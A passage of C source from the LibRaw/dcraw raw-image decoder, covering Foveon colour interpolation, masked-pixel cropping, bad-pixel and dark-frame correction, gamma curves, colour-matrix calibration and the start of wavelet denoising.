(black[row][c] - fsum[c] - last[0][c])*val + last[0][c];
memset (total, 0, sizeof total);
for (row=2; row < height; row+=4)
for (col=2; col < width; col+=4) {
FORC3 total[c] += (short) image[row*width+col][c];
total[3]++;
}
for (row=0; row < height; row++)
FORC3 black[row][c] += fsum[c]/2 + total[c]/(total[3]*100.0);
for (row=0; row < height; row++) {
for (i=0; i < 6; i++)
((float *)ddft[0])[i] = ((float *)ddft[1])[i] +
row / (height-1.0) * (((float *)ddft[2])[i] - ((float *)ddft[1])[i]);
pix = image[row*width];
memcpy (prev, pix, sizeof prev);
frow = row / (height-1.0) * (dim[2]-1);
if ((irow = frow) == dim[2]-1) irow--;
frow -= irow;
for (i=0; i < dim[1]; i++)
FORC3 sgrow[i][c] = sgain[ irow *dim[1]+i][c] * (1-frow) +
sgain[(irow+1)*dim[1]+i][c] * frow;
for (col=0; col < width; col++) {
FORC3 {
diff = pix[c] - prev[c];
prev[c] = pix[c];
ipix[c] = pix[c] + floor ((diff + (diff*diff >> 14)) * cfilt
- ddft[0][c][1] - ddft[0][c][0] * ((float) col/width - 0.5)
- black[row][c] );
}
FORC3 {
work[0][c] = ipix[c] * ipix[c] >> 14;
work[2][c] = ipix[c] * work[0][c] >> 14;
work[1][2-c] = ipix[(c+1) % 3] * ipix[(c+2) % 3] >> 14;
}
FORC3 {
for (val=i=0; i < 3; i++)
for ( j=0; j < 3; j++)
val += ppm[c][i][j] * work[i][j];
ipix[c] = floor ((ipix[c] + floor(val)) *
( sgrow[col/sgx ][c] * (sgx - col%sgx) +
sgrow[col/sgx+1][c] * (col%sgx) ) / sgx / div[c]);
if (ipix[c] > 32000) ipix[c] = 32000;
pix[c] = ipix[c];
}
pix += 4;
}
}
free (black);
free (sgrow);
free (sgain);
if ((badpix = (unsigned *) foveon_camf_matrix (dim, "BadPixels"))) {
for (i=0; i < dim[0]; i++) {
col = (badpix[i] >> 8 & 0xfff) - keep[0];
row = (badpix[i] >> 20 ) - keep[1];
if ((unsigned)(row-1) > height-3 || (unsigned)(col-1) > width-3)
continue;
memset (fsum, 0, sizeof fsum);
for (sum=j=0; j < 8; j++)
if (badpix[i] & (1 << j)) {
FORC3 fsum[c] += (short)
image[(row+hood[j*2])*width+col+hood[j*2+1]][c];
sum++;
}
if (sum) FORC3 image[row*width+col][c] = fsum[c]/sum;
}
free (badpix);
}
/* Array for 5x5 Gaussian averaging of red values */
smrow[6] = (int (*)[3]) calloc (width*5, sizeof **smrow);
merror (smrow[6], "foveon_interpolate()");
for (i=0; i < 5; i++)
smrow[i] = smrow[6] + i*width;
/* Sharpen the reds against these Gaussian averages */
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
smrow[4][col][0] =
(pix[0]*6 + (pix[-4]+pix[4])*4 + pix[-8]+pix[8] + 8) >> 4;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
smred = ( 6 * smrow[2][col][0]
+ 4 * (smrow[1][col][0] + smrow[3][col][0])
+ smrow[0][col][0] + smrow[4][col][0] + 8 ) >> 4;
if (col == 2)
smred_p = smred;
i = pix[0] + ((pix[0] - ((smred*7 + smred_p) >> 3)) >> 3);
if (i > 32000) i = 32000;
pix[0] = i;
smred_p = smred;
pix += 4;
}
}
/* Adjust the brighter pixels for better linearity */
min = 0xffff;
FORC3 {
i = satlev[c] / div[c];
if (min > i) min = i;
}
limit = min * 9 >> 4;
for (pix=image[0]; pix < image[height*width]; pix+=4) {
if (pix[0] <= limit || pix[1] <= limit || pix[2] <= limit)
continue;
min = max = pix[0];
for (c=1; c < 3; c++) {
if (min > pix[c]) min = pix[c];
if (max < pix[c]) max = pix[c];
}
if (min >= limit*2) {
pix[0] = pix[1] = pix[2] = max;
} else {
i = 0x4000 - ((min - limit) << 14) / limit;
i = 0x4000 - (i*i >> 14);
i = i*i >> 14;
FORC3 pix[c] += (max - pix[c]) * i >> 14;
}
}
/*
Because photons that miss one detector often hit another,
the sum R+G+B is much less noisy than the individual colors.
So smooth the hues without smoothing the total.
*/
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
FORC3 smrow[4][col][c] = (pix[c-4]+2*pix[c]+pix[c+4]+2) >> 2;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
FORC3 dev[c] = -foveon_apply_curve (curve[7], pix[c] -
((smrow[1][col][c] + 2*smrow[2][col][c] + smrow[3][col][c]) >> 2));
sum = (dev[0] + dev[1] + dev[2]) >> 3;
FORC3 pix[c] += dev[c] - sum;
pix += 4;
}
}
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
FORC3 smrow[4][col][c] =
(pix[c-8]+pix[c-4]+pix[c]+pix[c+4]+pix[c+8]+2) >> 2;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
for (total[3]=375, sum=60, c=0; c < 3; c++) {
for (total[c]=i=0; i < 5; i++)
total[c] += smrow[i][col][c];
total[3] += total[c];
sum += pix[c];
}
if (sum < 0) sum = 0;
j = total[3] > 375 ? (sum << 16) / total[3] : sum * 174;
FORC3 pix[c] += foveon_apply_curve (curve[6],
((j*total[c] + 0x8000) >> 16) - pix[c]);
pix += 4;
}
}
/* Transform the image to a different colorspace */
for (pix=image[0]; pix < image[height*width]; pix+=4) {
FORC3 pix[c] -= foveon_apply_curve (curve[c], pix[c]);
sum = (pix[0]+pix[1]+pix[1]+pix[2]) >> 2;
FORC3 pix[c] -= foveon_apply_curve (curve[c], pix[c]-sum);
FORC3 {
for (dsum=i=0; i < 3; i++)
dsum += trans[c][i] * pix[i];
if (dsum < 0) dsum = 0;
if (dsum > 24000) dsum = 24000;
ipix[c] = dsum + 0.5;
}
FORC3 pix[c] = ipix[c];
}
/* Smooth the image bottom-to-top and save at 1/4 scale */
shrink = (short (*)[3]) calloc ((height/4), (width/4)*sizeof *shrink);
merror (shrink, "foveon_interpolate()");
for (row = height/4; row--; )
for (col=0; col < width/4; col++) {
ipix[0] = ipix[1] = ipix[2] = 0;
for (i=0; i < 4; i++)
for (j=0; j < 4; j++)
FORC3 ipix[c] += image[(row*4+i)*width+col*4+j][c];
FORC3
if (row+2 > height/4)
shrink[row*(width/4)+col][c] = ipix[c] >> 4;
else
shrink[row*(width/4)+col][c] =
(shrink[(row+1)*(width/4)+col][c]*1840 + ipix[c]*141 + 2048) >> 12;
}
/* From the 1/4-scale image, smooth right-to-left */
for (row=0; row < (height & ~3); row++) {
ipix[0] = ipix[1] = ipix[2] = 0;
if ((row & 3) == 0)
for (col = width & ~3 ; col--; )
FORC3 smrow[0][col][c] = ipix[c] =
(shrink[(row/4)*(width/4)+col/4][c]*1485 + ipix[c]*6707 + 4096) >> 13;
/* Then smooth left-to-right */
ipix[0] = ipix[1] = ipix[2] = 0;
for (col=0; col < (width & ~3); col++)
FORC3 smrow[1][col][c] = ipix[c] =
(smrow[0][col][c]*1485 + ipix[c]*6707 + 4096) >> 13;
/* Smooth top-to-bottom */
if (row == 0)
memcpy (smrow[2], smrow[1], sizeof **smrow * width);
else
for (col=0; col < (width & ~3); col++)
FORC3 smrow[2][col][c] =
(smrow[2][col][c]*6707 + smrow[1][col][c]*1485 + 4096) >> 13;
/* Adjust the chroma toward the smooth values */
for (col=0; col < (width & ~3); col++) {
for (i=j=30, c=0; c < 3; c++) {
i += smrow[2][col][c];
j += image[row*width+col][c];
}
j = (j << 16) / i;
for (sum=c=0; c < 3; c++) {
ipix[c] = foveon_apply_curve (curve[c+3],
((smrow[2][col][c] * j + 0x8000) >> 16) - image[row*width+col][c]);
sum += ipix[c];
}
sum >>= 3;
FORC3 {
i = image[row*width+col][c] + ipix[c] - sum;
if (i < 0) i = 0;
image[row*width+col][c] = i;
}
}
}
free (shrink);
free (smrow[6]);
for (i=0; i < 8; i++)
free (curve[i]);
/* Trim off the black border */
active[1] -= keep[1];
active[3] -= 2;
i = active[2] - active[0];
for (row=0; row < active[3]-active[1]; row++)
memcpy (image[row*i], image[(row+active[1])*width+active[0]],
i * sizeof *image);
width = i;
height = row;
}
#undef image
/* RESTRICTED code ends here */
//@out COMMON
void CLASS crop_masked_pixels()
{
int row, col;
unsigned
#ifndef LIBRAW_LIBRARY_BUILD
r, raw_pitch = raw_width*2,
c, m, mblack[8], zero, val;
#else
c, m, zero, val;
#define mblack imgdata.color.black_stat
#endif
#ifndef LIBRAW_LIBRARY_BUILD
if (load_raw == &CLASS phase_one_load_raw ||
load_raw == &CLASS phase_one_load_raw_c)
phase_one_correct();
if (fuji_width) {
for (row=0; row < raw_height-top_margin*2; row++) {
for (col=0; col < fuji_width << !fuji_layout; col++) {
if (fuji_layout) {
r = fuji_width - 1 - col + (row >> 1);
c = col + ((row+1) >> 1);
} else {
r = fuji_width - 1 + row - (col >> 1);
c = row + ((col+1) >> 1);
}
if (r < height && c < width)
BAYER(r,c) = RAW(row+top_margin,col+left_margin);
}
}
} else {
for (row=0; row < height; row++)
for (col=0; col < width; col++)
BAYER2(row,col) = RAW(row+top_margin,col+left_margin);
}
#endif
if (mask[0][3] > 0) goto mask_set;
if (load_raw == &CLASS canon_load_raw ||
load_raw == &CLASS lossless_jpeg_load_raw) {
mask[0][1] = mask[1][1] += 2;
mask[0][3] -= 2;
goto sides;
}
if (load_raw == &CLASS canon_600_load_raw ||
load_raw == &CLASS sony_load_raw ||
(load_raw == &CLASS eight_bit_load_raw && strncmp(model,"DC2",3)) ||
load_raw == &CLASS kodak_262_load_raw ||
(load_raw == &CLASS packed_load_raw && (load_flags & 32))) {
sides:
mask[0][0] = mask[1][0] = top_margin;
mask[0][2] = mask[1][2] = top_margin+height;
mask[0][3] += left_margin;
mask[1][1] += left_margin+width;
mask[1][3] += raw_width;
}
if (load_raw == &CLASS nokia_load_raw) {
mask[0][2] = top_margin;
mask[0][3] = width;
}
#ifdef LIBRAW_LIBRARY_BUILD
if (load_raw == &CLASS broadcom_load_raw) {
mask[0][2] = top_margin;
mask[0][3] = width;
}
#endif
mask_set:
memset (mblack, 0, sizeof mblack);
for (zero=m=0; m < 8; m++)
for (row=MAX(mask[m][0],0); row < MIN(mask[m][2],raw_height); row++)
for (col=MAX(mask[m][1],0); col < MIN(mask[m][3],raw_width); col++) {
c = FC(row-top_margin,col-left_margin);
mblack[c] += val = raw_image[(row)*raw_pitch/2+(col)];
mblack[4+c]++;
zero += !val;
}
if (load_raw == &CLASS canon_600_load_raw && width < raw_width) {
black = (mblack[0]+mblack[1]+mblack[2]+mblack[3]) /
(mblack[4]+mblack[5]+mblack[6]+mblack[7]) - 4;
#ifndef LIBRAW_LIBRARY_BUILD
canon_600_correct();
#endif
} else if (zero < mblack[4] && mblack[5] && mblack[6] && mblack[7]) {
FORC4 cblack[c] = mblack[c] / mblack[4+c];
black = cblack[4] = cblack[5] = cblack[6] = 0;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
#undef mblack
#endif
void CLASS remove_zeroes()
{
unsigned row, col, tot, n, r, c;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_REMOVE_ZEROES,0,2);
#endif
for (row=0; row < height; row++)
for (col=0; col < width; col++)
if (BAYER(row,col) == 0) {
tot = n = 0;
for (r = row-2; r <= row+2; r++)
for (c = col-2; c <= col+2; c++)
if (r < height && c < width &&
FC(r,c) == FC(row,col) && BAYER(r,c))
tot += (n++,BAYER(r,c));
if (n) BAYER(row,col) = tot/n;
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_REMOVE_ZEROES,1,2);
#endif
}
//@end COMMON
/* @out FILEIO
#include <math.h>
#define CLASS LibRaw::
#include "libraw/libraw_types.h"
#define LIBRAW_LIBRARY_BUILD
#include "libraw/libraw.h"
#include "internal/defines.h"
#include "internal/var_defines.h"
@end FILEIO */
// @out FILEIO
/*
Seach from the current directory up to the root looking for
a ".badpixels" file, and fix those pixels now.
*/
void CLASS bad_pixels (const char *cfname)
{
FILE *fp=NULL;
#ifndef LIBRAW_LIBRARY_BUILD
char *fname, *cp, line[128];
int len, time, row, col, r, c, rad, tot, n, fixed=0;
#else
char *cp, line[128];
int time, row, col, r, c, rad, tot, n;
#ifdef DCRAW_VERBOSE
int fixed = 0;
#endif
#endif
if (!filters) return;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_BAD_PIXELS,0,2);
#endif
if (cfname)
fp = fopen (cfname, "r");
// @end FILEIO
else {
for (len=32 ; ; len *= 2) {
fname = (char *) malloc (len);
if (!fname) return;
if (getcwd (fname, len-16)) break;
free (fname);
if (errno != ERANGE) return;
}
#if defined(WIN32) || defined(DJGPP)
if (fname[1] == ':')
memmove (fname, fname+2, len-2);
for (cp=fname; *cp; cp++)
if (*cp == '\\') *cp = '/';
#endif
cp = fname + strlen(fname);
if (cp[-1] == '/') cp--;
while (*fname == '/') {
strcpy (cp, "/.badpixels");
if ((fp = fopen (fname, "r"))) break;
if (cp == fname) break;
while (*--cp != '/');
}
free (fname);
}
// @out FILEIO
if (!fp)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_BADPIXELMAP;
#endif
return;
}
while (fgets (line, 128, fp)) {
cp = strchr (line, '#');
if (cp) *cp = 0;
if (sscanf (line, "%d %d %d", &col, &row, &time) != 3) continue;
if ((unsigned) col >= width || (unsigned) row >= height) continue;
if (time > timestamp) continue;
for (tot=n=0, rad=1; rad < 3 && n==0; rad++)
for (r = row-rad; r <= row+rad; r++)
for (c = col-rad; c <= col+rad; c++)
if ((unsigned) r < height && (unsigned) c < width &&
(r != row || c != col) && fcol(r,c) == fcol(row,col)) {
tot += BAYER2(r,c);
n++;
}
BAYER2(row,col) = tot/n;
#ifdef DCRAW_VERBOSE
if (verbose) {
if (!fixed++)
fprintf (stderr,_("Fixed dead pixels at:"));
fprintf (stderr, " %d,%d", col, row);
}
#endif
}
#ifdef DCRAW_VERBOSE
if (fixed) fputc ('\n', stderr);
#endif
fclose (fp);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_BAD_PIXELS,1,2);
#endif
}
void CLASS subtract (const char *fname)
{
FILE *fp;
int dim[3]={0,0,0}, comment=0, number=0, error=0, nd=0, c, row, col;
ushort *pixel;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_DARK_FRAME,0,2);
#endif
if (!(fp = fopen (fname, "rb"))) {
#ifdef DCRAW_VERBOSE
perror (fname);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_DARKFRAME_FILE;
#endif
return;
}
if (fgetc(fp) != 'P' || fgetc(fp) != '5') error = 1;
while (!error && nd < 3 && (c = fgetc(fp)) != EOF) {
if (c == '#') comment = 1;
if (c == '\n') comment = 0;
if (comment) continue;
if (isdigit(c)) number = 1;
if (number) {
if (isdigit(c)) dim[nd] = dim[nd]*10 + c -'0';
else if (isspace(c)) {
number = 0; nd++;
} else error = 1;
}
}
if (error || nd < 3) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s is not a valid PGM file!\n"), fname);
#endif
fclose (fp); return;
} else if (dim[0] != width || dim[1] != height || dim[2] != 65535) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s has the wrong dimensions!\n"), fname);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_DARKFRAME_DIM;
#endif
fclose (fp); return;
}
pixel = (ushort *) calloc (width, sizeof *pixel);
merror (pixel, "subtract()");
for (row=0; row < height; row++) {
fread (pixel, 2, width, fp);
for (col=0; col < width; col++)
BAYER(row,col) = MAX (BAYER(row,col) - ntohs(pixel[col]), 0);
}
free (pixel);
fclose (fp);
memset (cblack, 0, sizeof cblack);
black = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_DARK_FRAME,1,2);
#endif
}
//@end FILEIO
//@out COMMON
static const uchar xlat[2][256] = {
{ 0xc1,0xbf,0x6d,0x0d,0x59,0xc5,0x13,0x9d,0x83,0x61,0x6b,0x4f,0xc7,0x7f,0x3d,0x3d,
0x53,0x59,0xe3,0xc7,0xe9,0x2f,0x95,0xa7,0x95,0x1f,0xdf,0x7f,0x2b,0x29,0xc7,0x0d,
0xdf,0x07,0xef,0x71,0x89,0x3d,0x13,0x3d,0x3b,0x13,0xfb,0x0d,0x89,0xc1,0x65,0x1f,
0xb3,0x0d,0x6b,0x29,0xe3,0xfb,0xef,0xa3,0x6b,0x47,0x7f,0x95,0x35,0xa7,0x47,0x4f,
0xc7,0xf1,0x59,0x95,0x35,0x11,0x29,0x61,0xf1,0x3d,0xb3,0x2b,0x0d,0x43,0x89,0xc1,
0x9d,0x9d,0x89,0x65,0xf1,0xe9,0xdf,0xbf,0x3d,0x7f,0x53,0x97,0xe5,0xe9,0x95,0x17,
0x1d,0x3d,0x8b,0xfb,0xc7,0xe3,0x67,0xa7,0x07,0xf1,0x71,0xa7,0x53,0xb5,0x29,0x89,
0xe5,0x2b,0xa7,0x17,0x29,0xe9,0x4f,0xc5,0x65,0x6d,0x6b,0xef,0x0d,0x89,0x49,0x2f,
0xb3,0x43,0x53,0x65,0x1d,0x49,0xa3,0x13,0x89,0x59,0xef,0x6b,0xef,0x65,0x1d,0x0b,
0x59,0x13,0xe3,0x4f,0x9d,0xb3,0x29,0x43,0x2b,0x07,0x1d,0x95,0x59,0x59,0x47,0xfb,
0xe5,0xe9,0x61,0x47,0x2f,0x35,0x7f,0x17,0x7f,0xef,0x7f,0x95,0x95,0x71,0xd3,0xa3,
0x0b,0x71,0xa3,0xad,0x0b,0x3b,0xb5,0xfb,0xa3,0xbf,0x4f,0x83,0x1d,0xad,0xe9,0x2f,
0x71,0x65,0xa3,0xe5,0x07,0x35,0x3d,0x0d,0xb5,0xe9,0xe5,0x47,0x3b,0x9d,0xef,0x35,
0xa3,0xbf,0xb3,0xdf,0x53,0xd3,0x97,0x53,0x49,0x71,0x07,0x35,0x61,0x71,0x2f,0x43,
0x2f,0x11,0xdf,0x17,0x97,0xfb,0x95,0x3b,0x7f,0x6b,0xd3,0x25,0xbf,0xad,0xc7,0xc5,
0xc5,0xb5,0x8b,0xef,0x2f,0xd3,0x07,0x6b,0x25,0x49,0x95,0x25,0x49,0x6d,0x71,0xc7 },
{ 0xa7,0xbc,0xc9,0xad,0x91,0xdf,0x85,0xe5,0xd4,0x78,0xd5,0x17,0x46,0x7c,0x29,0x4c,
0x4d,0x03,0xe9,0x25,0x68,0x11,0x86,0xb3,0xbd,0xf7,0x6f,0x61,0x22,0xa2,0x26,0x34,
0x2a,0xbe,0x1e,0x46,0x14,0x68,0x9d,0x44,0x18,0xc2,0x40,0xf4,0x7e,0x5f,0x1b,0xad,
0x0b,0x94,0xb6,0x67,0xb4,0x0b,0xe1,0xea,0x95,0x9c,0x66,0xdc,0xe7,0x5d,0x6c,0x05,
0xda,0xd5,0xdf,0x7a,0xef,0xf6,0xdb,0x1f,0x82,0x4c,0xc0,0x68,0x47,0xa1,0xbd,0xee,
0x39,0x50,0x56,0x4a,0xdd,0xdf,0xa5,0xf8,0xc6,0xda,0xca,0x90,0xca,0x01,0x42,0x9d,
0x8b,0x0c,0x73,0x43,0x75,0x05,0x94,0xde,0x24,0xb3,0x80,0x34,0xe5,0x2c,0xdc,0x9b,
0x3f,0xca,0x33,0x45,0xd0,0xdb,0x5f,0xf5,0x52,0xc3,0x21,0xda,0xe2,0x22,0x72,0x6b,
0x3e,0xd0,0x5b,0xa8,0x87,0x8c,0x06,0x5d,0x0f,0xdd,0x09,0x19,0x93,0xd0,0xb9,0xfc,
0x8b,0x0f,0x84,0x60,0x33,0x1c,0x9b,0x45,0xf1,0xf0,0xa3,0x94,0x3a,0x12,0x77,0x33,
0x4d,0x44,0x78,0x28,0x3c,0x9e,0xfd,0x65,0x57,0x16,0x94,0x6b,0xfb,0x59,0xd0,0xc8,
0x22,0x36,0xdb,0xd2,0x63,0x98,0x43,0xa1,0x04,0x87,0x86,0xf7,0xa6,0x26,0xbb,0xd6,
0x59,0x4d,0xbf,0x6a,0x2e,0xaa,0x2b,0xef,0xe6,0x78,0xb6,0x4e,0xe0,0x2f,0xdc,0x7c,
0xbe,0x57,0x19,0x32,0x7e,0x2a,0xd0,0xb8,0xba,0x29,0x00,0x3c,0x52,0x7d,0xa8,0x49,
0x3b,0x2d,0xeb,0x25,0x49,0xfa,0xa3,0xaa,0x39,0xa7,0xc5,0xa7,0x50,0x11,0x36,0xfb,
0xc6,0x67,0x4a,0xf5,0xa5,0x12,0x65,0x7e,0xb0,0xdf,0xaf,0x4e,0xb3,0x61,0x7f,0x2f } };
void CLASS gamma_curve (double pwr, double ts, int mode, int imax)
{
int i;
double g[6], bnd[2]={0,0}, r;
g[0] = pwr;
g[1] = ts;
g[2] = g[3] = g[4] = 0;
bnd[g[1] >= 1] = 1;
if (g[1] && (g[1]-1)*(g[0]-1) <= 0) {
for (i=0; i < 48; i++) {
g[2] = (bnd[0] + bnd[1])/2;
if (g[0]) bnd[(pow(g[2]/g[1],-g[0]) - 1)/g[0] - 1/g[2] > -1] = g[2];
else bnd[g[2]/exp(1-1/g[2]) < g[1]] = g[2];
}
g[3] = g[2] / g[1];
if (g[0]) g[4] = g[2] * (1/g[0] - 1);
}
if (g[0]) g[5] = 1 / (g[1]*SQR(g[3])/2 - g[4]*(1 - g[3]) +
(1 - pow(g[3],1+g[0]))*(1 + g[4])/(1 + g[0])) - 1;
else g[5] = 1 / (g[1]*SQR(g[3])/2 + 1
- g[2] - g[3] - g[2]*g[3]*(log(g[3]) - 1)) - 1;
if (!mode--) {
memcpy (gamm, g, sizeof gamm);
return;
}
for (i=0; i < 0x10000; i++) {
curve[i] = 0xffff;
if ((r = (double) i / imax) < 1)
curve[i] = 0x10000 * ( mode
? (r < g[3] ? r*g[1] : (g[0] ? pow( r,g[0])*(1+g[4])-g[4] : log(r)*g[2]+1))
: (r < g[2] ? r/g[1] : (g[0] ? pow((r+g[4])/(1+g[4]),1/g[0]) : exp((r-1)/g[2]))));
}
}
void CLASS pseudoinverse (double (*in)[3], double (*out)[3], int size)
{
double work[3][6], num;
int i, j, k;
for (i=0; i < 3; i++) {
for (j=0; j < 6; j++)
work[i][j] = j == i+3;
for (j=0; j < 3; j++)
for (k=0; k < size; k++)
work[i][j] += in[k][i] * in[k][j];
}
for (i=0; i < 3; i++) {
num = work[i][i];
for (j=0; j < 6; j++)
work[i][j] /= num;
for (k=0; k < 3; k++) {
if (k==i) continue;
num = work[k][i];
for (j=0; j < 6; j++)
work[k][j] -= work[i][j] * num;
}
}
for (i=0; i < size; i++)
for (j=0; j < 3; j++)
for (out[i][j]=k=0; k < 3; k++)
out[i][j] += work[j][k+3] * in[i][k];
}
void CLASS cam_xyz_coeff (float _rgb_cam[3][4], double cam_xyz[4][3])
{
double cam_rgb[4][3], inverse[4][3], num;
int i, j, k;
for (i=0; i < colors; i++) /* Multiply out XYZ colorspace */
for (j=0; j < 3; j++)
for (cam_rgb[i][j] = k=0; k < 3; k++)
cam_rgb[i][j] += cam_xyz[i][k] * xyz_rgb[k][j];
for (i=0; i < colors; i++) { /* Normalize cam_rgb so that */
for (num=j=0; j < 3; j++) /* cam_rgb * (1,1,1) is (1,1,1,1) */
num += cam_rgb[i][j];
if(num > 0.00001)
{
for (j=0; j < 3; j++)
cam_rgb[i][j] /= num;
pre_mul[i] = 1 / num;
}
else
{
for (j=0; j < 3; j++)
cam_rgb[i][j] = 0.0;
pre_mul[i] = 1.0;
}
}
pseudoinverse (cam_rgb, inverse, colors);
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
_rgb_cam[i][j] = inverse[j][i];
}
#ifdef COLORCHECK
void CLASS colorcheck()
{
#define NSQ 24
// Coordinates of the GretagMacbeth ColorChecker squares
// width, height, 1st_column, 1st_row
int cut[NSQ][4]; // you must set these
// ColorChecker Chart under 6500-kelvin illumination
static const double gmb_xyY[NSQ][3] = {
{ 0.400, 0.350, 10.1 }, // Dark Skin
{ 0.377, 0.345, 35.8 }, // Light Skin
{ 0.247, 0.251, 19.3 }, // Blue Sky
{ 0.337, 0.422, 13.3 }, // Foliage
{ 0.265, 0.240, 24.3 }, // Blue Flower
{ 0.261, 0.343, 43.1 }, // Bluish Green
{ 0.506, 0.407, 30.1 }, // Orange
{ 0.211, 0.175, 12.0 }, // Purplish Blue
{ 0.453, 0.306, 19.8 }, // Moderate Red
{ 0.285, 0.202, 6.6 }, // Purple
{ 0.380, 0.489, 44.3 }, // Yellow Green
{ 0.473, 0.438, 43.1 }, // Orange Yellow
{ 0.187, 0.129, 6.1 }, // Blue
{ 0.305, 0.478, 23.4 }, // Green
{ 0.539, 0.313, 12.0 }, // Red
{ 0.448, 0.470, 59.1 }, // Yellow
{ 0.364, 0.233, 19.8 }, // Magenta
{ 0.196, 0.252, 19.8 }, // Cyan
{ 0.310, 0.316, 90.0 }, // White
{ 0.310, 0.316, 59.1 }, // Neutral 8
{ 0.310, 0.316, 36.2 }, // Neutral 6.5
{ 0.310, 0.316, 19.8 }, // Neutral 5
{ 0.310, 0.316, 9.0 }, // Neutral 3.5
{ 0.310, 0.316, 3.1 } }; // Black
double gmb_cam[NSQ][4], gmb_xyz[NSQ][3];
double inverse[NSQ][3], cam_xyz[4][3], balance[4], num;
int c, i, j, k, sq, row, col, pass, count[4];
memset (gmb_cam, 0, sizeof gmb_cam);
for (sq=0; sq < NSQ; sq++) {
FORCC count[c] = 0;
for (row=cut[sq][3]; row < cut[sq][3]+cut[sq][1]; row++)
for (col=cut[sq][2]; col < cut[sq][2]+cut[sq][0]; col++) {
c = FC(row,col);
if (c >= colors) c -= 2;
gmb_cam[sq][c] += BAYER2(row,col);
BAYER2(row,col) = black + (BAYER2(row,col)-black)/2;
count[c]++;
}
FORCC gmb_cam[sq][c] = gmb_cam[sq][c]/count[c] - black;
gmb_xyz[sq][0] = gmb_xyY[sq][2] * gmb_xyY[sq][0] / gmb_xyY[sq][1];
gmb_xyz[sq][1] = gmb_xyY[sq][2];
gmb_xyz[sq][2] = gmb_xyY[sq][2] *
(1 - gmb_xyY[sq][0] - gmb_xyY[sq][1]) / gmb_xyY[sq][1];
}
pseudoinverse (gmb_xyz, inverse, NSQ);
for (pass=0; pass < 2; pass++) {
for (raw_color = i=0; i < colors; i++)
for (j=0; j < 3; j++)
for (cam_xyz[i][j] = k=0; k < NSQ; k++)
cam_xyz[i][j] += gmb_cam[k][i] * inverse[k][j];
cam_xyz_coeff (rgb_cam, cam_xyz);
FORCC balance[c] = pre_mul[c] * gmb_cam[20][c];
for (sq=0; sq < NSQ; sq++)
FORCC gmb_cam[sq][c] *= balance[c];
}
if (verbose) {
printf (" { \"%s %s\", %d,\n\t{", make, model, black);
num = 10000 / (cam_xyz[1][0] + cam_xyz[1][1] + cam_xyz[1][2]);
FORCC for (j=0; j < 3; j++)
printf ("%c%d", (c | j) ? ',':' ', (int) (cam_xyz[c][j] * num + 0.5));
puts (" } },");
}
#undef NSQ
}
#endif
void CLASS hat_transform (float *temp, float *base, int st, int size, int sc)
{
int i;
for (i=0; i < sc; i++)
temp[i] = 2*base[st*i] + base[st*(sc-i)] + base[st*(i+sc)];
for (; i+sc < size; i++)
temp[i] = 2*base[st*i] + base[st*(i-sc)] + base[st*(i+sc)];
for (; i < size; i++)
temp[i] = 2*base[st*i] + base[st*(i-sc)] + base[st*(2*size-2-(i+sc))];
}
#if !defined(LIBRAW_USE_OPENMP)
void CLASS wavelet_denoise()
{
float *fimg=0, *temp, thold, mul[2], avg, diff;
int scale=1, size, lev, hpass, lpass, row, col, nc, c, i, wlast, blk[2];
ushort *window[4];
static const float noise[] =
{ 0.8002,0.2735,0.1202,0.0585,0.0291,0.0152,0.0080,0.0044 };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Wavelet denoising...\n"));
#endif
while (maximum << scale < 0x10000) scale++;
maximum <<= --scale;
black <<= scale;
FORC4 cblack[c] <<= scale;
if ((size = iheight*iwidth) < 0x15550000)
fimg = (float *) malloc ((size*3 + iheight + iwidth) * sizeof *fimg);
merror (fimg, "wavelet_denoise()");
temp = fimg + size*3;
if ((nc = colors) == 3 && filters) nc++;
FORC(nc) { /* denoise R,G1,B,G3 individually */
for (i=0; i < size; i++)
fimg[i] = 256 * sqrt((double)(image[i][c] << scale));
for (hpass=lev=0; lev < 5; lev++) {
lpass = size*((lev & 1)+1);
for (row=0; row < iheight; row++) {
hat_transform (temp, fimg+hpass+row*iwidth, 1, iwidth, 1 << lev);
for (col=0; col < iwidth; col++)
fimg[lpass + row*iwidth + col] = temp[col] * 0.25;
}
for (col=0; col < iwidth; col++) {
hat_transform (temp, fimg+lpass+col, iwidth, iheight, 1 << lev);
for (row=0; row < iheight; row++)
fimg[lpass + row*iwidth + col] = temp[row] * 0.25;
}
thold = threshold * noise[lev];
for (i=0; i < size; i++) {
fimg[hpass+i] -= fimg[lpass+i];
if (fimg[hpass+i] < -thold) fimg[hpass+i] += thold;
else if (fimg[hpass+i] > thold) fimg[hpass+i] -= thold;
else fimg[hpass+i] = 0;
if (hpass) fimg[i] += fimg[hpass+i];
}
